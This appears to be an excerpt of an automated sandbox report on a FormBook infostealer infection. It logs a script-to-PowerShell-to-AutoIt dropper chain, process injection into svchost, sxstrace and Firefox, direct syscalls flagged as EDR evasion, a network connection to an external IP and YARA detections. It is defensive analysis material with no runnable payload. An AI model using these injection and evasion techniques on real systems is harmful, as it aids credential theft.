Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B276B2 mov eax, dword ptr fs:[00000030h]	6_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B276B2 mov eax, dword ptr fs:[00000030h]	6_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B666B0 mov eax, dword ptr fs:[00000030h]	6_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	6_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	6_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	6_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B34690 mov eax, dword ptr fs:[00000030h]	6_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B34690 mov eax, dword ptr fs:[00000030h]	6_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB368C mov eax, dword ptr fs:[00000030h]	6_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB368C mov eax, dword ptr fs:[00000030h]	6_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB368C mov eax, dword ptr fs:[00000030h]	6_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB368C mov eax, dword ptr fs:[00000030h]	6_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	6_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	6_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	6_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	6_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	6_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	6_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BED6F0 mov eax, dword ptr fs:[00000030h]	6_2_03BED6F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BC36EE mov eax, dword ptr fs:[00000030h]	6_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	6_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	6_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B636EF mov eax, dword ptr fs:[00000030h]	6_2_03B636EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	6_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	6_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF16CC mov eax, dword ptr fs:[00000030h]	6_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF16CC mov eax, dword ptr fs:[00000030h]	6_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF16CC mov eax, dword ptr fs:[00000030h]	6_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF16CC mov eax, dword ptr fs:[00000030h]	6_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BEF6C7 mov eax, dword ptr fs:[00000030h]	6_2_03BEF6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B616CF mov eax, dword ptr fs:[00000030h]	6_2_03B616CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4E627 mov eax, dword ptr fs:[00000030h]	6_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B2F626 mov eax, dword ptr fs:[00000030h]	6_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B66620 mov eax, dword ptr fs:[00000030h]	6_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B68620 mov eax, dword ptr fs:[00000030h]	6_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B3262C mov eax, dword ptr fs:[00000030h]	6_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B33616 mov eax, dword ptr fs:[00000030h]	6_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B33616 mov eax, dword ptr fs:[00000030h]	6_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72619 mov eax, dword ptr fs:[00000030h]	6_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B61607 mov eax, dword ptr fs:[00000030h]	6_2_03B61607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BAE609 mov eax, dword ptr fs:[00000030h]	6_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6F603 mov eax, dword ptr fs:[00000030h]	6_2_03B6F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4260B mov eax, dword ptr fs:[00000030h]	6_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B62674 mov eax, dword ptr fs:[00000030h]	6_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF866E mov eax, dword ptr fs:[00000030h]	6_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03BF866E mov eax, dword ptr fs:[00000030h]	6_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A660 mov eax, dword ptr fs:[00000030h]	6_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B6A660 mov eax, dword ptr fs:[00000030h]	6_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B69660 mov eax, dword ptr fs:[00000030h]	6_2_03B69660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B69660 mov eax, dword ptr fs:[00000030h]	6_2_03B69660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B4C640 mov eax, dword ptr fs:[00000030h]	6_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03C05636 mov eax, dword ptr fs:[00000030h]	6_2_03C05636

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

5_2_00E780A9

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		5_2_00E4A155
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E4A124 SetUnhandledExceptionFilter,		5_2_00E4A124

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 92.205.22.61 443

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sxstrace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sxstrace.exe

Thread register set: target process: 5604

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sxstrace.exe

Thread APC queued: target process: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3018008

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E787B1 LogonUserW,

5_2_00E787B1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00E23B3A

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

5_2_00E248D7

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E84C7F mouse_event,

5_2_00E84C7F

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Process created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E77CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

5_2_00E77CAF

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E7874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

5_2_00E7874B

Source: powershell.exe, 00000003.00000002.1519430210.000002491D69B000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000000.1467444928.0000000000ED4000.00000002.00000001.01000000.00000008.sdmp, x.exe.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: x.exe, qVTSNa7tUPbuzPK.exe, 00000008.00000002.2694158318.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721211179.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2694640775.0000000001421000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: qVTSNa7tUPbuzPK.exe, 00000008.00000002.2694158318.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721211179.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2694640775.0000000001421000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: qVTSNa7tUPbuzPK.exe, 00000008.00000002.2694158318.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721211179.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2694640775.0000000001421000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: qVTSNa7tUPbuzPK.exe, 00000008.00000002.2694158318.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721211179.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2694640775.0000000001421000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E4862B cpuid

5_2_00E4862B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E54E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00E54E87

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E61E06 GetUserNameW,

5_2_00E61E06

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E53F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

5_2_00E53F3A

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00E249A0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2694334630.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1802111485.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2694722151.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801343865.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2696950833.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
